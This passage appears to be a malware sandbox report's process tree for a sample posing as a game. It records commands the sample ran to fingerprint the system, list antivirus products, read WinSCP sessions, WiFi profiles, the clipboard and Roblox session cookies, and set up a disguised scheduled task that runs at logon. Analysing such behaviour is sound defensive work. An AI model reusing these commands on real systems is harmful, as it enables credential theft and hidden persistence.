  PID:744
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4236
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2392
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3748
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4004
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4800
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3428
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4572
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4088
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:2640
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4056
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:1876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4232
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4528
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3648
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3492
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:4564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get name | more +1"
  2⤵
  PID:10760
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic cpu get name
    3⤵
    PID:10800
- - C:\Windows\system32\more.com
    more +1
    3⤵
    PID:10812
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController get name | more +1"
  2⤵
  PID:10872
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic PATH Win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:10912
- - C:\Windows\system32\more.com
    more +1
    3⤵
    PID:10920
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
  2⤵
  PID:6560
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:9408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
  2⤵
  PID:10276
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
    3⤵
    PID:9052
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "tasklist"
  2⤵
  PID:3576
- - C:\Windows\system32\tasklist.exe
    tasklist
    3⤵
    PID:10932
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "wmic process where processid=4620 get ExecutablePath"
  2⤵
  PID:8420
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:7968
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic process where processid=4620 get ExecutablePath
    3⤵
    PID:10776
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
  2⤵
  PID:5216
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
    3⤵
    PID:5612
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""
  2⤵
  PID:10300
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"
    3⤵
    PID:10116
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""
  2⤵
  PID:8816
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"
    3⤵
    PID:9684
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""
  2⤵
  PID:8436
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"
    3⤵
    PID:1292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""
  2⤵
  PID:9832
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"
    3⤵
    PID:1952
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""
  2⤵
  PID:10968
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:9052
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"
    3⤵
    PID:10292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""
  2⤵
  PID:10480
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"
    3⤵
    PID:10408
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""
  2⤵
  PID:10856
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"
    3⤵
    PID:6328
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""
  2⤵
  PID:10268
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"
    3⤵
    PID:6924
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""
  2⤵
  PID:4972
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"
    3⤵
    PID:8496
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""
  2⤵
  PID:8352
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"
    3⤵
    PID:6272
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""
  2⤵
  PID:5944
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"
    3⤵
    PID:10260
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""
  2⤵
  PID:4496
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"
    3⤵
    PID:6568
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)""
  2⤵
  PID:5652
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)"
    3⤵
    PID:10940
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""
  2⤵
  PID:5828
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"
    3⤵
    PID:7692
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""
  2⤵
  PID:3392
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"
    3⤵
    PID:6724
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""
  2⤵
  PID:3376
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"
    3⤵
    PID:2688
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""
  2⤵
  PID:2496
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"
    3⤵
    PID:8348
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""
  2⤵
  PID:4356
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"
    3⤵
    PID:5024
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""
  2⤵
  PID:7716
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"
    3⤵
    PID:2136
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}""
  2⤵
  PID:7020
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{113C0ADC-B9BD-4F95-9653-4F5BC540ED03}"
    3⤵
    PID:4960
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""
  2⤵
  PID:9568
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"
    3⤵
    PID:5772
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}""
  2⤵
  PID:3408
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3544B2EE-E62F-4D11-B79C-3DDEACE94DA5}"
    3⤵
    PID:5484
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""
  2⤵
  PID:60
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"
    3⤵
    PID:7156
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}""
  2⤵
  PID:6060
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{3A706840-2882-423C-90EB-B31545E2BC7A}"
    3⤵
    PID:6664
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""
  2⤵
  PID:9024
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"
    3⤵
    PID:3468
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""
  2⤵
  PID:8640
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"
    3⤵
    PID:7292
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""
  2⤵
  PID:4084
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"
    3⤵
    PID:2240
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""
  2⤵
  PID:9668
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"
    3⤵
    PID:10028
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""
  2⤵
  PID:6820
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"
    3⤵
    PID:7092
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}""
  2⤵
  PID:1196
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{76DEEAB3-122F-4231-83C7-0C35363D02F9}"
    3⤵
    PID:7048
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""
  2⤵
  PID:6364
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"
    3⤵
    PID:9904
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""
  2⤵
  PID:7120
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"
    3⤵
    PID:8096
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""
  2⤵
  PID:6200
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"
    3⤵
    PID:3564
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""
  2⤵
  PID:8
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"
    3⤵
    PID:8788
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}""
  2⤵
  PID:7828
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{AE86D888-1404-47CC-A7BB-8D86C0503E58}"
    3⤵
    PID:9876
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}""
  2⤵
  PID:3544
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{C7141A99-592B-4226-A4E9-B767C1D0FBAF}"
    3⤵
    PID:8632
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""
  2⤵
  PID:8668
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"
    3⤵
    PID:6080
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""
  2⤵
  PID:6432
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"
    3⤵
    PID:5332
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}""
  2⤵
  PID:2016
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{D44822A8-FC28-42FC-8B1D-21A78579FC79}"
    3⤵
    PID:10072
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}""
  2⤵
  PID:3776
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{E016F2B9-01FE-4FAA-882E-ECC43FA49751}"
    3⤵
    PID:8112
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\2SNBzFMvzYIh_temp.ps1""
  2⤵
  PID:6720
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\2SNBzFMvzYIh_temp.ps1"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:7852
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "cscript C:\Users\Admin\AppData\Roaming\GimBLQf9P91B.vbs"
  2⤵
  PID:5476
- - C:\Windows\system32\cscript.exe
    cscript C:\Users\Admin\AppData\Roaming\GimBLQf9P91B.vbs
    3⤵
    PID:6452
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -Command "& { function Get-AntiVirusProduct { [CmdletBinding()] param ( [parameter(ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias('name')] $computername=$env:computername ) $AntiVirusProducts = Get-WmiObject -Namespace \"root\SecurityCenter2\" -Class AntiVirusProduct -ComputerName $computername $ret = @() foreach ($AntiVirusProduct in $AntiVirusProducts) { switch ($AntiVirusProduct.productState) { \"262144\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"262160\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"266240\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"266256\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"393216\" { $defstatus = \"Up to date\"; $rtstatus = \"Disabled\" } \"393232\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"393488\" { $defstatus = \"Out of date\"; $rtstatus = \"Disabled\" } \"397312\" { $defstatus = \"Up to date\"; $rtstatus = \"Enabled\" } \"397328\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } \"397584\" { $defstatus = \"Out of date\"; $rtstatus = \"Enabled\" } default { $defstatus = \"Unknown\"; $rtstatus = \"Unknown\" } } $ht = @{} $ht.Computername = $computername $ht.Name = $AntiVirusProduct.displayName $ht.'Product GUID' = $AntiVirusProduct.instanceGuid $ht.'Product Executable' = $AntiVirusProduct.pathToSignedProductExe $ht.'Reporting Exe' = $AntiVirusProduct.pathToSignedReportingExe $ht.'Definition Status' = $defstatus $ht.'Real-time Protection Status' = $rtstatus # Créez un nouvel objet pour chaque ordinateur $ret += New-Object -TypeName PSObject -Property $ht } Return $ret } Get-AntiVirusProduct }"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:1584
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions""
  2⤵
  PID:10008
- - C:\Windows\system32\reg.exe
    C:\Windows\system32\reg.exe QUERY "HKCU\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"
    3⤵
    PID:3108
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -Command "& {netsh wlan show profile}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:9596
- - C:\Windows\system32\netsh.exe
    "C:\Windows\system32\netsh.exe" wlan show profile
    3⤵
    PID:7748
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -NoProfile -Command "& {powershell Get-Clipboard}"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5472
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Get-Clipboard
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:6148
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
  2⤵
  PID:6848
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:3560
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
  2⤵
  PID:5764
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupfUc7wH /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\BlendyGameBeta.exe\" /F /rl highest"
  2⤵
  PID:1944
- - C:\Windows\system32\cmd.exe
    cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupfUc7wH /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\BlendyGameBeta.exe\" /F /rl highest
    3⤵
    PID:7348
  - - C:\Windows\system32\schtasks.exe
      schtasks /create /sc onlogon /tn WindowsDriverSetupfUc7wH /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\BlendyGameBeta.exe\" /F /rl highest
      4⤵
      Creates scheduled task(s)
      PID:7388
- C:\Windows\system32\cmd.exe
